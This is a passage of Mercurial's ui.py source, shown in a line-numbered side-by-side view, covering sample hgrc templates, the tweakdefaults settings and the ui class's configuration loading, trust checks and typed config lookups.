28 setattr,
28 setattr,
29 )
29 )
30
30
31 from . import (
31 from . import (
32 color,
32 color,
33 config,
33 config,
34 configitems,
34 configitems,
35 encoding,
35 encoding,
36 error,
36 error,
37 formatter,
37 formatter,
38 loggingutil,
38 loggingutil,
39 progress,
39 progress,
40 pycompat,
40 pycompat,
41 rcutil,
41 rcutil,
42 scmutil,
42 scmutil,
43 util,
43 util,
44 )
44 )
45 from .utils import (
45 from .utils import (
46 dateutil,
46 dateutil,
47 procutil,
47 procutil,
48 stringutil,
48 stringutil,
49 )
49 )
50
50
51 urlreq = util.urlreq
51 urlreq = util.urlreq
52
52
53 # for use with str.translate(None, _keepalnum), to keep just alphanumerics
53 # for use with str.translate(None, _keepalnum), to keep just alphanumerics
54 _keepalnum = b''.join(
54 _keepalnum = b''.join(
55 c for c in map(pycompat.bytechr, range(256)) if not c.isalnum()
55 c for c in map(pycompat.bytechr, range(256)) if not c.isalnum()
56 )
56 )
57
57
58 # The config knobs that will be altered (if unset) by ui.tweakdefaults.
58 # The config knobs that will be altered (if unset) by ui.tweakdefaults.
59 tweakrc = b"""
59 tweakrc = b"""
60 [ui]
60 [ui]
61 # The rollback command is dangerous. As a rule, don't use it.
61 # The rollback command is dangerous. As a rule, don't use it.
62 rollback = False
62 rollback = False
63 # Make `hg status` report copy information
63 # Make `hg status` report copy information
64 statuscopies = yes
64 statuscopies = yes
65 # Prefer curses UIs when available. Revert to plain-text with `text`.
65 # Prefer curses UIs when available. Revert to plain-text with `text`.
66 interface = curses
66 interface = curses
67 # Make compatible commands emit cwd-relative paths by default.
67 # Make compatible commands emit cwd-relative paths by default.
68 relative-paths = yes
68 relative-paths = yes
69
69
70 [commands]
70 [commands]
71 # Grep working directory by default.
71 # Grep working directory by default.
72 grep.all-files = True
72 grep.all-files = True
73 # Refuse to perform an `hg update` that would cause a file content merge
73 # Refuse to perform an `hg update` that would cause a file content merge
74 update.check = noconflict
74 update.check = noconflict
75 # Show conflicts information in `hg status`
75 # Show conflicts information in `hg status`
76 status.verbose = True
76 status.verbose = True
77 # Make `hg resolve` with no action (like `-m`) fail instead of re-merging.
77 # Make `hg resolve` with no action (like `-m`) fail instead of re-merging.
78 resolve.explicit-re-merge = True
78 resolve.explicit-re-merge = True
79
79
80 [diff]
80 [diff]
81 git = 1
81 git = 1
82 showfunc = 1
82 showfunc = 1
83 word-diff = 1
83 word-diff = 1
84 """
84 """
85
85
86 samplehgrcs = {
86 samplehgrcs = {
87 b'user': b"""# example user config (see 'hg help config' for more info)
87 b'user': b"""# example user config (see 'hg help config' for more info)
88 [ui]
88 [ui]
89 # name and email, e.g.
89 # name and email, e.g.
90 # username = Jane Doe <jdoe@example.com>
90 # username = Jane Doe <jdoe@example.com>
91 username =
91 username =
92
92
93 # We recommend enabling tweakdefaults to get slight improvements to
93 # We recommend enabling tweakdefaults to get slight improvements to
94 # the UI over time. Make sure to set HGPLAIN in the environment when
94 # the UI over time. Make sure to set HGPLAIN in the environment when
95 # writing scripts!
95 # writing scripts!
96 # tweakdefaults = True
96 # tweakdefaults = True
97
97
98 # uncomment to disable color in command output
98 # uncomment to disable color in command output
99 # (see 'hg help color' for details)
99 # (see 'hg help color' for details)
100 # color = never
100 # color = never
101
101
102 # uncomment to disable command output pagination
102 # uncomment to disable command output pagination
103 # (see 'hg help pager' for details)
103 # (see 'hg help pager' for details)
104 # paginate = never
104 # paginate = never
105
105
106 [extensions]
106 [extensions]
107 # uncomment the lines below to enable some popular extensions
107 # uncomment the lines below to enable some popular extensions
108 # (see 'hg help extensions' for more info)
108 # (see 'hg help extensions' for more info)
109 #
109 #
110 # histedit =
110 # histedit =
111 # rebase =
111 # rebase =
112 # uncommit =
112 # uncommit =
113 """,
113 """,
114 b'cloned': b"""# example repository config (see 'hg help config' for more info)
114 b'cloned': b"""# example repository config (see 'hg help config' for more info)
115 [paths]
115 [paths]
116 default = %s
116 default = %s
117
117
118 # path aliases to other clones of this repo in URLs or filesystem paths
118 # path aliases to other clones of this repo in URLs or filesystem paths
119 # (see 'hg help config.paths' for more info)
119 # (see 'hg help config.paths' for more info)
120 #
120 #
121 # default:pushurl = ssh://jdoe@example.net/hg/jdoes-fork
121 # default:pushurl = ssh://jdoe@example.net/hg/jdoes-fork
122 # my-fork = ssh://jdoe@example.net/hg/jdoes-fork
122 # my-fork = ssh://jdoe@example.net/hg/jdoes-fork
123 # my-clone = /home/jdoe/jdoes-clone
123 # my-clone = /home/jdoe/jdoes-clone
124
124
125 [ui]
125 [ui]
126 # name and email (local to this repository, optional), e.g.
126 # name and email (local to this repository, optional), e.g.
127 # username = Jane Doe <jdoe@example.com>
127 # username = Jane Doe <jdoe@example.com>
128 """,
128 """,
129 b'local': b"""# example repository config (see 'hg help config' for more info)
129 b'local': b"""# example repository config (see 'hg help config' for more info)
130 [paths]
130 [paths]
131 # path aliases to other clones of this repo in URLs or filesystem paths
131 # path aliases to other clones of this repo in URLs or filesystem paths
132 # (see 'hg help config.paths' for more info)
132 # (see 'hg help config.paths' for more info)
133 #
133 #
134 # default = http://example.com/hg/example-repo
134 # default = http://example.com/hg/example-repo
135 # default:pushurl = ssh://jdoe@example.net/hg/jdoes-fork
135 # default:pushurl = ssh://jdoe@example.net/hg/jdoes-fork
136 # my-fork = ssh://jdoe@example.net/hg/jdoes-fork
136 # my-fork = ssh://jdoe@example.net/hg/jdoes-fork
137 # my-clone = /home/jdoe/jdoes-clone
137 # my-clone = /home/jdoe/jdoes-clone
138
138
139 [ui]
139 [ui]
140 # name and email (local to this repository, optional), e.g.
140 # name and email (local to this repository, optional), e.g.
141 # username = Jane Doe <jdoe@example.com>
141 # username = Jane Doe <jdoe@example.com>
142 """,
142 """,
143 b'global': b"""# example system-wide hg config (see 'hg help config' for more info)
143 b'global': b"""# example system-wide hg config (see 'hg help config' for more info)
144
144
145 [ui]
145 [ui]
146 # uncomment to disable color in command output
146 # uncomment to disable color in command output
147 # (see 'hg help color' for details)
147 # (see 'hg help color' for details)
148 # color = never
148 # color = never
149
149
150 # uncomment to disable command output pagination
150 # uncomment to disable command output pagination
151 # (see 'hg help pager' for details)
151 # (see 'hg help pager' for details)
152 # paginate = never
152 # paginate = never
153
153
154 [extensions]
154 [extensions]
155 # uncomment the lines below to enable some popular extensions
155 # uncomment the lines below to enable some popular extensions
156 # (see 'hg help extensions' for more info)
156 # (see 'hg help extensions' for more info)
157 #
157 #
158 # blackbox =
158 # blackbox =
159 # churn =
159 # churn =
160 """,
160 """,
161 }
161 }
162
162
163
163
164 def _maybestrurl(maybebytes):
164 def _maybestrurl(maybebytes):
165 return pycompat.rapply(pycompat.strurl, maybebytes)
165 return pycompat.rapply(pycompat.strurl, maybebytes)
166
166
167
167
168 def _maybebytesurl(maybestr):
168 def _maybebytesurl(maybestr):
169 return pycompat.rapply(pycompat.bytesurl, maybestr)
169 return pycompat.rapply(pycompat.bytesurl, maybestr)
170
170
171
171
172 class httppasswordmgrdbproxy(object):
172 class httppasswordmgrdbproxy(object):
173 """Delays loading urllib2 until it's needed."""
173 """Delays loading urllib2 until it's needed."""
174
174
175 def __init__(self):
175 def __init__(self):
176 self._mgr = None
176 self._mgr = None
177
177
178 def _get_mgr(self):
178 def _get_mgr(self):
179 if self._mgr is None:
179 if self._mgr is None:
180 self._mgr = urlreq.httppasswordmgrwithdefaultrealm()
180 self._mgr = urlreq.httppasswordmgrwithdefaultrealm()
181 return self._mgr
181 return self._mgr
182
182
183 def add_password(self, realm, uris, user, passwd):
183 def add_password(self, realm, uris, user, passwd):
184 return self._get_mgr().add_password(
184 return self._get_mgr().add_password(
185 _maybestrurl(realm),
185 _maybestrurl(realm),
186 _maybestrurl(uris),
186 _maybestrurl(uris),
187 _maybestrurl(user),
187 _maybestrurl(user),
188 _maybestrurl(passwd),
188 _maybestrurl(passwd),
189 )
189 )
190
190
191 def find_user_password(self, realm, uri):
191 def find_user_password(self, realm, uri):
192 mgr = self._get_mgr()
192 mgr = self._get_mgr()
193 return _maybebytesurl(
193 return _maybebytesurl(
194 mgr.find_user_password(_maybestrurl(realm), _maybestrurl(uri))
194 mgr.find_user_password(_maybestrurl(realm), _maybestrurl(uri))
195 )
195 )
196
196
197
197
198 def _catchterm(*args):
198 def _catchterm(*args):
199 raise error.SignalInterrupt
199 raise error.SignalInterrupt
200
200
201
201
202 # unique object used to detect no default value has been provided when
202 # unique object used to detect no default value has been provided when
203 # retrieving configuration value.
203 # retrieving configuration value.
204 _unset = object()
204 _unset = object()
205
205
206 # _reqexithandlers: callbacks run at the end of a request
206 # _reqexithandlers: callbacks run at the end of a request
207 _reqexithandlers = []
207 _reqexithandlers = []
208
208
209
209
210 class ui(object):
210 class ui(object):
211 def __init__(self, src=None):
211 def __init__(self, src=None):
212 """Create a fresh new ui object if no src given
212 """Create a fresh new ui object if no src given
213
213
214 Use uimod.ui.load() to create a ui which knows global and user configs.
214 Use uimod.ui.load() to create a ui which knows global and user configs.
215 In most cases, you should use ui.copy() to create a copy of an existing
215 In most cases, you should use ui.copy() to create a copy of an existing
216 ui object.
216 ui object.
217 """
217 """
218 # _buffers: used for temporary capture of output
218 # _buffers: used for temporary capture of output
219 self._buffers = []
219 self._buffers = []
220 # 3-tuple describing how each buffer in the stack behaves.
220 # 3-tuple describing how each buffer in the stack behaves.
221 # Values are (capture stderr, capture subprocesses, apply labels).
221 # Values are (capture stderr, capture subprocesses, apply labels).
222 self._bufferstates = []
222 self._bufferstates = []
223 # When a buffer is active, defines whether we are expanding labels.
223 # When a buffer is active, defines whether we are expanding labels.
224 # This exists to prevent an extra list lookup.
224 # This exists to prevent an extra list lookup.
225 self._bufferapplylabels = None
225 self._bufferapplylabels = None
226 self.quiet = self.verbose = self.debugflag = self.tracebackflag = False
226 self.quiet = self.verbose = self.debugflag = self.tracebackflag = False
227 self._reportuntrusted = True
227 self._reportuntrusted = True
228 self._knownconfig = configitems.coreitems
228 self._knownconfig = configitems.coreitems
229 self._ocfg = config.config() # overlay
229 self._ocfg = config.config() # overlay
230 self._tcfg = config.config() # trusted
230 self._tcfg = config.config() # trusted
231 self._ucfg = config.config() # untrusted
231 self._ucfg = config.config() # untrusted
232 self._trustusers = set()
232 self._trustusers = set()
233 self._trustgroups = set()
233 self._trustgroups = set()
234 self.callhooks = True
234 self.callhooks = True
235 # Insecure server connections requested.
235 # Insecure server connections requested.
236 self.insecureconnections = False
236 self.insecureconnections = False
237 # Blocked time
237 # Blocked time
238 self.logblockedtimes = False
238 self.logblockedtimes = False
239 # color mode: see mercurial/color.py for possible values
239 # color mode: see mercurial/color.py for possible values
240 self._colormode = None
240 self._colormode = None
241 self._terminfoparams = {}
241 self._terminfoparams = {}
242 self._styles = {}
242 self._styles = {}
243 self._uninterruptible = False
243 self._uninterruptible = False
244
244
245 if src:
245 if src:
246 self._fout = src._fout
246 self._fout = src._fout
247 self._ferr = src._ferr
247 self._ferr = src._ferr
248 self._fin = src._fin
248 self._fin = src._fin
249 self._fmsg = src._fmsg
249 self._fmsg = src._fmsg
250 self._fmsgout = src._fmsgout
250 self._fmsgout = src._fmsgout
251 self._fmsgerr = src._fmsgerr
251 self._fmsgerr = src._fmsgerr
252 self._finoutredirected = src._finoutredirected
252 self._finoutredirected = src._finoutredirected
253 self._loggers = src._loggers.copy()
253 self._loggers = src._loggers.copy()
254 self.pageractive = src.pageractive
254 self.pageractive = src.pageractive
255 self._disablepager = src._disablepager
255 self._disablepager = src._disablepager
256 self._tweaked = src._tweaked
256 self._tweaked = src._tweaked
257
257
258 self._tcfg = src._tcfg.copy()
258 self._tcfg = src._tcfg.copy()
259 self._ucfg = src._ucfg.copy()
259 self._ucfg = src._ucfg.copy()
260 self._ocfg = src._ocfg.copy()
260 self._ocfg = src._ocfg.copy()
261 self._trustusers = src._trustusers.copy()
261 self._trustusers = src._trustusers.copy()
262 self._trustgroups = src._trustgroups.copy()
262 self._trustgroups = src._trustgroups.copy()
263 self.environ = src.environ
263 self.environ = src.environ
264 self.callhooks = src.callhooks
264 self.callhooks = src.callhooks
265 self.insecureconnections = src.insecureconnections
265 self.insecureconnections = src.insecureconnections
266 self._colormode = src._colormode
266 self._colormode = src._colormode
267 self._terminfoparams = src._terminfoparams.copy()
267 self._terminfoparams = src._terminfoparams.copy()
268 self._styles = src._styles.copy()
268 self._styles = src._styles.copy()
269
269
270 self.fixconfig()
270 self.fixconfig()
271
271
272 self.httppasswordmgrdb = src.httppasswordmgrdb
272 self.httppasswordmgrdb = src.httppasswordmgrdb
273 self._blockedtimes = src._blockedtimes
273 self._blockedtimes = src._blockedtimes
274 else:
274 else:
275 self._fout = procutil.stdout
275 self._fout = procutil.stdout
276 self._ferr = procutil.stderr
276 self._ferr = procutil.stderr
277 self._fin = procutil.stdin
277 self._fin = procutil.stdin
278 self._fmsg = None
278 self._fmsg = None
279 self._fmsgout = self.fout # configurable
279 self._fmsgout = self.fout # configurable
280 self._fmsgerr = self.ferr # configurable
280 self._fmsgerr = self.ferr # configurable
281 self._finoutredirected = False
281 self._finoutredirected = False
282 self._loggers = {}
282 self._loggers = {}
283 self.pageractive = False
283 self.pageractive = False
284 self._disablepager = False
284 self._disablepager = False
285 self._tweaked = False
285 self._tweaked = False
286
286
287 # shared read-only environment
287 # shared read-only environment
288 self.environ = encoding.environ
288 self.environ = encoding.environ
289
289
290 self.httppasswordmgrdb = httppasswordmgrdbproxy()
290 self.httppasswordmgrdb = httppasswordmgrdbproxy()
291 self._blockedtimes = collections.defaultdict(int)
291 self._blockedtimes = collections.defaultdict(int)
292
292
293 allowed = self.configlist(b'experimental', b'exportableenviron')
293 allowed = self.configlist(b'experimental', b'exportableenviron')
294 if b'*' in allowed:
294 if b'*' in allowed:
295 self._exportableenviron = self.environ
295 self._exportableenviron = self.environ
296 else:
296 else:
297 self._exportableenviron = {}
297 self._exportableenviron = {}
298 for k in allowed:
298 for k in allowed:
299 if k in self.environ:
299 if k in self.environ:
300 self._exportableenviron[k] = self.environ[k]
300 self._exportableenviron[k] = self.environ[k]
301
301
302 @classmethod
302 @classmethod
303 def load(cls):
303 def load(cls):
304 """Create a ui and load global and user configs"""
304 """Create a ui and load global and user configs"""
305 u = cls()
305 u = cls()
306 # we always trust global config files and environment variables
306 # we always trust global config files and environment variables
307 for t, f in rcutil.rccomponents():
307 for t, f in rcutil.rccomponents():
308 if t == b'path':
308 if t == b'path':
309 u.readconfig(f, trust=True)
309 u.readconfig(f, trust=True)
310 elif t == b'items':
310 elif t == b'items':
311 sections = set()
311 sections = set()
312 for section, name, value, source in f:
312 for section, name, value, source in f:
313 # do not set u._ocfg
313 # do not set u._ocfg
314 # XXX clean this up once immutable config object is a thing
314 # XXX clean this up once immutable config object is a thing
315 u._tcfg.set(section, name, value, source)
315 u._tcfg.set(section, name, value, source)
316 u._ucfg.set(section, name, value, source)
316 u._ucfg.set(section, name, value, source)
317 sections.add(section)
317 sections.add(section)
318 for section in sections:
318 for section in sections:
319 u.fixconfig(section=section)
319 u.fixconfig(section=section)
320 else:
320 else:
321 raise error.ProgrammingError(b'unknown rctype: %s' % t)
321 raise error.ProgrammingError(b'unknown rctype: %s' % t)
322 u._maybetweakdefaults()
322 u._maybetweakdefaults()
323 return u
323 return u
324
324
325 def _maybetweakdefaults(self):
325 def _maybetweakdefaults(self):
326 if not self.configbool(b'ui', b'tweakdefaults'):
326 if not self.configbool(b'ui', b'tweakdefaults'):
327 return
327 return
328 if self._tweaked or self.plain(b'tweakdefaults'):
328 if self._tweaked or self.plain(b'tweakdefaults'):
329 return
329 return
330
330
331 # Note: it is SUPER IMPORTANT that you set self._tweaked to
331 # Note: it is SUPER IMPORTANT that you set self._tweaked to
332 # True *before* any calls to setconfig(), otherwise you'll get
332 # True *before* any calls to setconfig(), otherwise you'll get
333 # infinite recursion between setconfig and this method.
333 # infinite recursion between setconfig and this method.
334 #
334 #
335 # TODO: We should extract an inner method in setconfig() to
335 # TODO: We should extract an inner method in setconfig() to
336 # avoid this weirdness.
336 # avoid this weirdness.
337 self._tweaked = True
337 self._tweaked = True
338 tmpcfg = config.config()
338 tmpcfg = config.config()
339 tmpcfg.parse(b'<tweakdefaults>', tweakrc)
339 tmpcfg.parse(b'<tweakdefaults>', tweakrc)
340 for section in tmpcfg:
340 for section in tmpcfg:
341 for name, value in tmpcfg.items(section):
341 for name, value in tmpcfg.items(section):
342 if not self.hasconfig(section, name):
342 if not self.hasconfig(section, name):
343 self.setconfig(section, name, value, b"<tweakdefaults>")
343 self.setconfig(section, name, value, b"<tweakdefaults>")
344
344
345 def copy(self):
345 def copy(self):
346 return self.__class__(self)
346 return self.__class__(self)
347
347
348 def resetstate(self):
348 def resetstate(self):
349 """Clear internal state that shouldn't persist across commands"""
349 """Clear internal state that shouldn't persist across commands"""
350 if self._progbar:
350 if self._progbar:
351 self._progbar.resetstate() # reset last-print time of progress bar
351 self._progbar.resetstate() # reset last-print time of progress bar
352 self.httppasswordmgrdb = httppasswordmgrdbproxy()
352 self.httppasswordmgrdb = httppasswordmgrdbproxy()
353
353
354 @contextlib.contextmanager
354 @contextlib.contextmanager
355 def timeblockedsection(self, key):
355 def timeblockedsection(self, key):
356 # this is open-coded below - search for timeblockedsection to find them
356 # this is open-coded below - search for timeblockedsection to find them
357 starttime = util.timer()
357 starttime = util.timer()
358 try:
358 try:
359 yield
359 yield
360 finally:
360 finally:
361 self._blockedtimes[key + b'_blocked'] += (
361 self._blockedtimes[key + b'_blocked'] += (
362 util.timer() - starttime
362 util.timer() - starttime
363 ) * 1000
363 ) * 1000
364
364
365 @contextlib.contextmanager
365 @contextlib.contextmanager
366 def uninterruptible(self):
366 def uninterruptible(self):
367 """Mark an operation as unsafe.
367 """Mark an operation as unsafe.
368
368
369 Most operations on a repository are safe to interrupt, but a
369 Most operations on a repository are safe to interrupt, but a
370 few are risky (for example repair.strip). This context manager
370 few are risky (for example repair.strip). This context manager
371 lets you advise Mercurial that something risky is happening so
371 lets you advise Mercurial that something risky is happening so
372 that control-C etc can be blocked if desired.
372 that control-C etc can be blocked if desired.
373 """
373 """
374 enabled = self.configbool(b'experimental', b'nointerrupt')
374 enabled = self.configbool(b'experimental', b'nointerrupt')
375 if enabled and self.configbool(
375 if enabled and self.configbool(
376 b'experimental', b'nointerrupt-interactiveonly'
376 b'experimental', b'nointerrupt-interactiveonly'
377 ):
377 ):
378 enabled = self.interactive()
378 enabled = self.interactive()
379 if self._uninterruptible or not enabled:
379 if self._uninterruptible or not enabled:
380 # if nointerrupt support is turned off, the process isn't
380 # if nointerrupt support is turned off, the process isn't
381 # interactive, or we're already in an uninterruptible
381 # interactive, or we're already in an uninterruptible
382 # block, do nothing.
382 # block, do nothing.
383 yield
383 yield
384 return
384 return
385
385
386 def warn():
386 def warn():
387 self.warn(_(b"shutting down cleanly\n"))
387 self.warn(_(b"shutting down cleanly\n"))
388 self.warn(
388 self.warn(
389 _(b"press ^C again to terminate immediately (dangerous)\n")
389 _(b"press ^C again to terminate immediately (dangerous)\n")
390 )
390 )
391 return True
391 return True
392
392
393 with procutil.uninterruptible(warn):
393 with procutil.uninterruptible(warn):
394 try:
394 try:
395 self._uninterruptible = True
395 self._uninterruptible = True
396 yield
396 yield
397 finally:
397 finally:
398 self._uninterruptible = False
398 self._uninterruptible = False
399
399
400 def formatter(self, topic, opts):
400 def formatter(self, topic, opts):
401 return formatter.formatter(self, self, topic, opts)
401 return formatter.formatter(self, self, topic, opts)
402
402
403 def _trusted(self, fp, f):
403 def _trusted(self, fp, f):
404 st = util.fstat(fp)
404 st = util.fstat(fp)
405 if util.isowner(st):
405 if util.isowner(st):
406 return True
406 return True
407
407
408 tusers, tgroups = self._trustusers, self._trustgroups
408 tusers, tgroups = self._trustusers, self._trustgroups
409 if b'*' in tusers or b'*' in tgroups:
409 if b'*' in tusers or b'*' in tgroups:
410 return True
410 return True
411
411
412 user = util.username(st.st_uid)
412 user = util.username(st.st_uid)
413 group = util.groupname(st.st_gid)
413 group = util.groupname(st.st_gid)
414 if user in tusers or group in tgroups or user == util.username():
414 if user in tusers or group in tgroups or user == util.username():
415 return True
415 return True
416
416
417 if self._reportuntrusted:
417 if self._reportuntrusted:
418 self.warn(
418 self.warn(
419 _(
419 _(
420 b'not trusting file %s from untrusted '
420 b'not trusting file %s from untrusted '
421 b'user %s, group %s\n'
421 b'user %s, group %s\n'
422 )
422 )
423 % (f, user, group)
423 % (f, user, group)
424 )
424 )
425 return False
425 return False
426
426
427 def readconfig(
428 self, filename, root=None, trust=False, sections=None, remap=None
429 ):
430 try:
431 fp = open(filename, 'rb')
432 except IOError:
433 if not sections: # ignore unless we were looking for something
434 return
435 raise
436
437 with fp:
438 cfg = config.config()
439 trusted = sections or trust or self._trusted(fp, filename)
440
441 try:
442 cfg.read(filename, fp, sections=sections, remap=remap)
443 except error.ParseError as inst:
444 if trusted:
445 raise
446 self.warn(_(b'ignored: %s\n') % stringutil.forcebytestr(inst))
447
448 if self.plain():
449 for k in (
450 b'debug',
451 b'fallbackencoding',
452 b'quiet',
453 b'slash',
454 b'logtemplate',
455 b'message-output',
456 b'statuscopies',
457 b'style',
458 b'traceback',
459 b'verbose',
460 ):
461 if k in cfg[b'ui']:
462 del cfg[b'ui'][k]
463 for k, v in cfg.items(b'defaults'):
464 del cfg[b'defaults'][k]
465 for k, v in cfg.items(b'commands'):
466 del cfg[b'commands'][k]
467 # Don't remove aliases from the configuration if in the exceptionlist
468 if self.plain(b'alias'):
469 for k, v in cfg.items(b'alias'):
470 del cfg[b'alias'][k]
471 if self.plain(b'revsetalias'):
472 for k, v in cfg.items(b'revsetalias'):
473 del cfg[b'revsetalias'][k]
474 if self.plain(b'templatealias'):
475 for k, v in cfg.items(b'templatealias'):
476 del cfg[b'templatealias'][k]
477
478 if trusted:
479 self._tcfg.update(cfg)
480 self._tcfg.update(self._ocfg)
481 self._ucfg.update(cfg)
482 self._ucfg.update(self._ocfg)
483
484 if root is None:
485 root = os.path.expanduser(b'~')
486 self.fixconfig(root=root)
487
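A hedged usage sketch of the method above (the file path is hypothetical): reading an extra file for just its `[paths]` section. Note that passing `sections` also makes the result trusted, per the `trusted = sections or trust or ...` line.

u.readconfig(b'/tmp/extra.rc', root=b'/tmp', sections=[b'paths'])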
488 def fixconfig(self, root=None, section=None):
489 if section in (None, b'paths'):
490 # expand vars and ~
491 # translate paths relative to root (or home) into absolute paths
492 root = root or encoding.getcwd()
493 for c in self._tcfg, self._ucfg, self._ocfg:
494 for n, p in c.items(b'paths'):
495 # Ignore sub-options.
496 if b':' in n:
497 continue
498 if not p:
499 continue
500 if b'%%' in p:
501 s = self.configsource(b'paths', n) or b'none'
502 self.warn(
503 _(b"(deprecated '%%' in path %s=%s from %s)\n")
504 % (n, p, s)
505 )
506 p = p.replace(b'%%', b'%')
507 p = util.expandpath(p)
508 if not util.hasscheme(p) and not os.path.isabs(p):
509 p = os.path.normpath(os.path.join(root, p))
510 c.set(b"paths", n, p)
511
512 if section in (None, b'ui'):
513 # update ui options
514 self._fmsgout, self._fmsgerr = _selectmsgdests(self)
515 self.debugflag = self.configbool(b'ui', b'debug')
516 self.verbose = self.debugflag or self.configbool(b'ui', b'verbose')
517 self.quiet = not self.debugflag and self.configbool(b'ui', b'quiet')
518 if self.verbose and self.quiet:
519 self.quiet = self.verbose = False
520 self._reportuntrusted = self.debugflag or self.configbool(
521 b"ui", b"report_untrusted"
522 )
523 self.tracebackflag = self.configbool(b'ui', b'traceback')
524 self.logblockedtimes = self.configbool(b'ui', b'logblockedtimes')
525
526 if section in (None, b'trusted'):
527 # update trust information
528 self._trustusers.update(self.configlist(b'trusted', b'users'))
529 self._trustgroups.update(self.configlist(b'trusted', b'groups'))
530
531 if section in (None, b'devel', b'ui') and self.debugflag:
532 tracked = set()
533 if self.configbool(b'devel', b'debug.extensions'):
534 tracked.add(b'extension')
535 if tracked:
536 logger = loggingutil.fileobjectlogger(self._ferr, tracked)
537 self.setlogger(b'debug', logger)
538
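For the `[paths]` branch above, relative entries are normalized and made absolute against `root` (the directory supplied by the caller, typically the repository or home directory), while anything with a URL scheme is left alone. An illustrative hgrc (names are examples):

[paths]
# relative entries become absolute against <root>, normalized:
upstream = ../upstream-repo
# URLs (util.hasscheme) are left untouched:
default = https://example.org/repo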
539 def backupconfig(self, section, item):
540 return (
541 self._ocfg.backup(section, item),
542 self._tcfg.backup(section, item),
543 self._ucfg.backup(section, item),
544 )
545
546 def restoreconfig(self, data):
547 self._ocfg.restore(data[0])
548 self._tcfg.restore(data[1])
549 self._ucfg.restore(data[2])
550
551 def setconfig(self, section, name, value, source=b''):
552 for cfg in (self._ocfg, self._tcfg, self._ucfg):
553 cfg.set(section, name, value, source)
554 self.fixconfig(section=section)
555 self._maybetweakdefaults()
556
557 def _data(self, untrusted):
558 return untrusted and self._ucfg or self._tcfg
559
560 def configsource(self, section, name, untrusted=False):
561 return self._data(untrusted).source(section, name)
562
563 def config(self, section, name, default=_unset, untrusted=False):
564 """return the plain string version of a config"""
565 value = self._config(
566 section, name, default=default, untrusted=untrusted
567 )
568 if value is _unset:
569 return None
570 return value
571
572 def _config(self, section, name, default=_unset, untrusted=False):
573 value = itemdefault = default
574 item = self._knownconfig.get(section, {}).get(name)
575 alternates = [(section, name)]
576
577 if item is not None:
578 alternates.extend(item.alias)
579 if callable(item.default):
580 itemdefault = item.default()
581 else:
582 itemdefault = item.default
583 else:
584 msg = b"accessing unregistered config item: '%s.%s'"
585 msg %= (section, name)
586 self.develwarn(msg, 2, b'warn-config-unknown')
587
588 if default is _unset:
589 if item is None:
590 value = default
591 elif item.default is configitems.dynamicdefault:
592 value = None
593 msg = b"config item requires an explicit default value: '%s.%s'"
594 msg %= (section, name)
595 self.develwarn(msg, 2, b'warn-config-default')
596 else:
597 value = itemdefault
598 elif (
599 item is not None
600 and item.default is not configitems.dynamicdefault
601 and default != itemdefault
602 ):
603 msg = (
604 b"specifying a mismatched default value for a registered "
605 b"config item: '%s.%s' '%s'"
606 )
607 msg %= (section, name, pycompat.bytestr(default))
608 self.develwarn(msg, 2, b'warn-config-default')
609
610 for s, n in alternates:
611 candidate = self._data(untrusted).get(s, n, None)
612 if candidate is not None:
613 value = candidate
614 break
615
616 if self.debugflag and not untrusted and self._reportuntrusted:
617 for s, n in alternates:
618 uvalue = self._ucfg.get(s, n)
619 if uvalue is not None and uvalue != value:
620 self.debug(
621 b"ignoring untrusted configuration option "
622 b"%s.%s = %s\n" % (s, n, uvalue)
623 )
624 return value
625
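The `develwarn` calls above fire when code reads an option that was never registered. Extensions normally avoid that with the standard `registrar.configitem` pattern; a sketch, where `myext` and its option are made-up names:

from mercurial import registrar

configtable = {}
configitem = registrar.configitem(configtable)

# once registered, ui.configbool(b'myext', b'some-flag') is warning-free
configitem(b'myext', b'some-flag', default=False)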
626 def configsuboptions(self, section, name, default=_unset, untrusted=False):
627 """Get a config option and all sub-options.
628
629 Some config options have sub-options that are declared with the
630 format "key:opt = value". This method is used to return the main
631 option and all its declared sub-options.
632
633 Returns a 2-tuple of ``(option, sub-options)``, where ``sub-options``
634 is a dict of defined sub-options where keys and values are strings.
635 """
636 main = self.config(section, name, default, untrusted=untrusted)
637 data = self._data(untrusted)
638 sub = {}
639 prefix = b'%s:' % name
640 for k, v in data.items(section):
641 if k.startswith(prefix):
642 sub[k[len(prefix) :]] = v
643
644 if self.debugflag and not untrusted and self._reportuntrusted:
645 for k, v in sub.items():
646 uvalue = self._ucfg.get(section, b'%s:%s' % (name, k))
647 if uvalue is not None and uvalue != v:
648 self.debug(
649 b'ignoring untrusted configuration option '
650 b'%s:%s.%s = %s\n' % (section, name, k, uvalue)
651 )
652
653 return main, sub
654
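A short sketch of the `key:opt = value` syntax handled above, using the real `paths.*:pushurl` sub-option (the URLs are illustrative):

u.setconfig(b'paths', b'default', b'https://example.org/repo')
u.setconfig(b'paths', b'default:pushurl', b'ssh://example.org/repo')
main, sub = u.configsuboptions(b'paths', b'default')
# main == b'https://example.org/repo'
# sub == {b'pushurl': b'ssh://example.org/repo'}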
655 def configpath(self, section, name, default=_unset, untrusted=False):
656 """get a path config item, expanded relative to repo root or config
657 file"""
658 v = self.config(section, name, default, untrusted)
659 if v is None:
660 return None
661 if not os.path.isabs(v) or b"://" not in v:
662 src = self.configsource(section, name, untrusted)
663 if b':' in src:
664 base = os.path.dirname(src.rsplit(b':')[0])
665 v = os.path.join(base, os.path.expanduser(v))
666 return v
667
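A hedged sketch of the resolution above: a relative value read from an hgrc is joined to that hgrc's own directory, derived from the `file:line` source string (the option and paths here are illustrative):

# ~/.hgrc contains:
#   [web]
#   cacerts = certs/ca.pem
u.configpath(b'web', b'cacerts')
# -> roughly b'/home/user/certs/ca.pem', i.e. joined to the hgrc's directory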
668 def configbool(self, section, name, default=_unset, untrusted=False):
669 """parse a configuration element as a boolean
670
671 >>> u = ui(); s = b'foo'
672 >>> u.setconfig(s, b'true', b'yes')
673 >>> u.configbool(s, b'true')
674 True
675 >>> u.setconfig(s, b'false', b'no')
676 >>> u.configbool(s, b'false')
677 False
678 >>> u.configbool(s, b'unknown')
679 False
680 >>> u.configbool(s, b'unknown', True)
681 True
682 >>> u.setconfig(s, b'invalid', b'somevalue')
683 >>> u.configbool(s, b'invalid')
684 Traceback (most recent call last):
685 ...
686 ConfigError: foo.invalid is not a boolean ('somevalue')
687 """
688
689 v = self._config(section, name, default, untrusted=untrusted)
690 if v is None:
691 return v
692 if v is _unset:
693 if default is _unset:
694 return False
695 return default
696 if isinstance(v, bool):
697 return v
698 b = stringutil.parsebool(v)
699 if b is None:
700 raise error.ConfigError(
701 _(b"%s.%s is not a boolean ('%s')") % (section, name, v)
702 )
703 return b
704
705 def configwith(
706 self, convert, section, name, default=_unset, desc=None, untrusted=False
